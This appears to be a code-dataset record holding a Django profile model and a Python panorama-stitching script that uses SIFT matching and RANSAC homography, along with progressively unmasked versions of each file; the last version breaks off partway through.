filename = '{}.{}'.format(uuid4().hex, ext)
return os.path.join(upload_to, filename)
MALE = 'M'
FEMALE = 'F'
CHOICES_GENDER = (
(MALE, 'M'),
(FEMALE, 'F'),
)
username = models.CharField(max_length=255, unique=True)
repository_name = models.CharField(max_length=255, unique=True)
page_title = models.CharField(max_length=255)
description = models.CharField(max_length=255)
baseurl = models.CharField(max_length=255, default="/")
url = models.URLField(max_length=200, unique=True)
avatar = models.ImageField(upload_to=path_and_rename, height_field=None, width_field=None,
max_length=255, blank=True, null=True)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
gender = models.CharField(max_length=1, choices=CHOICES_GENDER)
title = models.CharField(max_length=255, blank=True, null=True)
company = models.CharField(max_length=255, blank=True, null=True)
email = models.EmailField(max_length=254, unique=True)
phone = models.CharField(max_length=255, blank=True, null=True)
website = models.URLField(max_length=200, blank=True, null=True)
facebook_url = models.URLField(max_length=200, blank=True, null=True)
linkedin_url = models.URLField(max_length=200, blank=True, null=True)
instagram_url = models.URLField(max_length=200, blank=True, null=True)
pinterest_url = models.URLField(max_length=200, blank=True, null=True)
twitter_url = models.URLField(max_length=200, blank=True, null=True)
youtube_url = models.URLField(max_length=200, blank=True, null=True)
snapchat_url = models.URLField(max_length=200, blank=True, null=True)
whatsapp_url = models.URLField(max_length=200, blank=True, null=True)
tiktok_url = models.URLField(max_length=200, blank=True, null=True)
telegram_url = models.URLField(max_length=200, blank=True, null=True)
skype_url = models.URLField(max_length=200, blank=True, null=True)
github_url = models.URLField(max_length=200, blank=True, null=True)
gitlab_url = models.URLField(max_length=200, blank=True, null=True)
markdown = models.CharField(max_length=255, default="kramdown")
def __str__(self):
return self.username
|
normal
|
{
"blob_id": "01153a695b4744465b706acb4c417217c5e3cefd",
"index": 3516,
"step-1": "<mask token>\n\n\nclass Card_profile(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.username\n",
"step-2": "<mask token>\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.username\n",
"step-3": "<mask token>\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n MALE = 'M'\n FEMALE = 'F'\n CHOICES_GENDER = (MALE, 'M'), (FEMALE, 'F')\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default='/')\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None,\n width_field=None, max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n telegram_url = models.URLField(max_length=200, blank=True, null=True)\n skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default='kramdown')\n\n def __str__(self):\n return self.username\n",
"step-4": "from django.db import models\nimport os\nfrom uuid import uuid4\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n MALE = 'M'\n FEMALE = 'F'\n CHOICES_GENDER = (MALE, 'M'), (FEMALE, 'F')\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default='/')\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None,\n width_field=None, max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n telegram_url = models.URLField(max_length=200, blank=True, null=True)\n skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default='kramdown')\n\n def __str__(self):\n return self.username\n",
"step-5": "from django.db import models\nimport os\nfrom uuid import uuid4\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n\n return os.path.join(upload_to, filename)\n\n MALE = 'M'\n FEMALE = 'F'\n\n CHOICES_GENDER = (\n (MALE, 'M'),\n (FEMALE, 'F'),\n )\n\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default=\"/\")\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None, width_field=None,\n max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n telegram_url = models.URLField(max_length=200, blank=True, null=True)\n skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default=\"kramdown\")\n\n def __str__(self):\n return self.username\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import time
import numpy as np
import matplotlib.pyplot as plt
import cv2
import matplotlib.image as mpimg
import random
import skimage
import scipy
from PIL import Image
def readimg(dirs, imgname):
img = cv2.imread(dirs + imgname)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
return img
def readimg_color(dirs, imgname):
img = cv2.imread(dirs + imgname)
img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
return img
def sift_descriptor(img):
sift = cv2.xfeatures2d.SIFT_create()
kp, dsp = sift.detectAndCompute(img, None)
return kp, dsp
def show_sift(kp, img):
# show the img with descriptors
copyimg = img.copy()
copyimg = cv2.drawKeypoints(img, kp, copyimg)
plt.imshow(copyimg)
plt.show()
def calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):
# fast computation of Euclidean distance between each descriptors
dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')
# find the matching coordinates
idx1 = np.where(dist < num_threshold)[0]
idx2 = np.where(dist < num_threshold)[1]
coord1 = np.array([kp1[idx].pt for idx in idx1])
coord2 = np.array([kp2[idx].pt for idx in idx2])
# put into pairs of coords
match_coords = np.concatenate((coord1, coord2), axis=1)
return match_coords
def get_errors(matches, H):
# difference between original img2 points and transformed img1 points with H
num_pairs = len(matches)
# all matching points in img1
p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)
# all matching points in img2
p2 = matches[:, 2:4]
# Transform every point in p1 to estimate p2.
transformed_p1 = np.zeros((num_pairs, 2))
for i in range(num_pairs):
transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2]
# Compute error of each matching pair
errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2
return errors
def compute_H(subset):
# calculate the fitted homography
A = []
for i in range(subset.shape[0]):
p1 = np.append(subset[i][0:2], 1)
p2 = np.append(subset[i][2:4], 1)
row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1]*p1[0], -p2[1]*p1[1], -p2[1]*p1[2]]
row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0]*p1[0], -p2[0]*p1[1], -p2[0]*p1[2]]
A.append(row1)
A.append(row2)
A = np.array(A)
U, s, V = np.linalg.svd(A)
H = V[len(V)-1].reshape(3, 3)
# normalize
H = H / H[2, 2]
return H
def show_inlier_matches(img1, img2, inliers):
print("num of inliers shown in the matching: " + str(len(inliers)))
h1, w1 = img1.shape
h2, w2 = img2.shape
vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)
vis[:, :w1] = img1
vis[:h2, w1:] = img2
fig, ax = plt.subplots()
ax.imshow(vis)
ax.plot([inliers[:,0], inliers[:,2] + w1],[inliers[:,1], inliers[:,3]])
plt.show()
def ransac(img1, img2, matches, thres_ransac):
itertimes = 1000
inliners = 0
max_inliners = 0
for iter in range(0, itertimes):
subset_idx = random.sample(range(matches.shape[0]), k=4)
subset = matches[subset_idx]
H = compute_H(subset)
# check if it is full rank
if np.linalg.matrix_rank(H) < 3:
continue
# the norm of error caused if we choose the above subset
errors = get_errors(matches, H)
idx = np.where(errors < thres_ransac)[0]
inlinerspts = matches[idx]
# find the best number of inliners
inliners = len(inlinerspts)
if inliners >= max_inliners:
which_inliners = inlinerspts.copy()
max_inliners = inliners
best_H = H.copy()
avg_residual = sum(get_errors(matches[idx], H)) / inliners
print("num of inliners: " + str(max_inliners) + " average residual: " + str(avg_residual))
show_inlier_matches(img1, img2, which_inliners)
return best_H
# function provided by Maghav at Piazza @450
def warp_images(image0, image1, H):
transform = skimage.transform.ProjectiveTransform(H)
warp = skimage.transform.warp
r, c = image1.shape[:2]
# Note that transformations take coordinates in (x, y) format,
# not (row, column), in order to be consistent with most literature
corners = np.array([[0, 0],
[0, r],
[c, 0],
[c, r]])
# Warp the image corners to their new positions
warped_corners = transform(corners)
# Find the extents of both the reference image and the warped
# target image
all_corners = np.vstack((warped_corners, corners))
corner_min = np.min(all_corners, axis=0)
corner_max = np.max(all_corners, axis=0)
output_shape = (corner_max - corner_min)
output_shape = np.ceil(output_shape[::-1])
offset = skimage.transform.SimilarityTransform(translation=-corner_min)
image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)
image1_ = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=-1)
image0_zeros = warp(image0, offset.inverse, output_shape=output_shape, cval=0)
image1_zeros = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=0)
overlap = (image0_ != -1.0 ).astype(int) + (image1_ != -1.0).astype(int)
overlap += (overlap < 1).astype(int)
merged = (image0_zeros+image1_zeros)/overlap
im = Image.fromarray((255*merged).astype('uint8'), mode='RGB')
im = np.asarray(im)
return im
def main(leftimg, rightimg, leftimgcolor, rightimgcolor):
# using 7000, 0.5 for 2 pic; 9000, 1.0 for 3 pic
thres = 9000
thres_ransac = 1.0
kp1, dsp1 = sift_descriptor(leftimg)
kp2, dsp2 = sift_descriptor(rightimg)
# get all matching points
matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)
H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)
stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)
return stitched_img
def main_2pic():
dirs = 'MP3_part1_data/' + 'park/'
leftimg = readimg(dirs, 'left.jpg')
rightimg = readimg(dirs, 'right.jpg')
leftimgcolor = readimg_color(dirs, 'left.jpg')
rightimgcolor = readimg_color(dirs, 'right.jpg')
stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)
plt.imshow(stitched_img)
plt.show()
def main_3pic():
dirs = 'MP3_part1_data/' + 'pier/' # ledge pier hill
leftimg = readimg(dirs, '1.jpg')
midimg = readimg(dirs, '2.jpg')
rightimg = readimg(dirs, '3.jpg')
leftimgcolor = readimg_color(dirs, '1.jpg')
midimgcolor = readimg_color(dirs, '2.jpg')
rightimgcolor = readimg_color(dirs, '3.jpg')
stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)
plt.imshow(stitched1)
plt.show()
grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)
stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)
plt.imshow(stitched2)
plt.show()
if __name__ == '__main__':
#main_2pic()
main_3pic()
|
normal
|
{
"blob_id": "e08ab06be0957e5e173df798742abc493eac84d0",
"index": 6006,
"step-1": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\n<mask token>\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\n<mask token>\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\n<mask token>\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\n<mask token>\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\n<mask token>\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\ndef get_errors(matches, H):\n num_pairs = len(matches)\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n p2 = matches[:, 2:4]\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2\n ]\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = 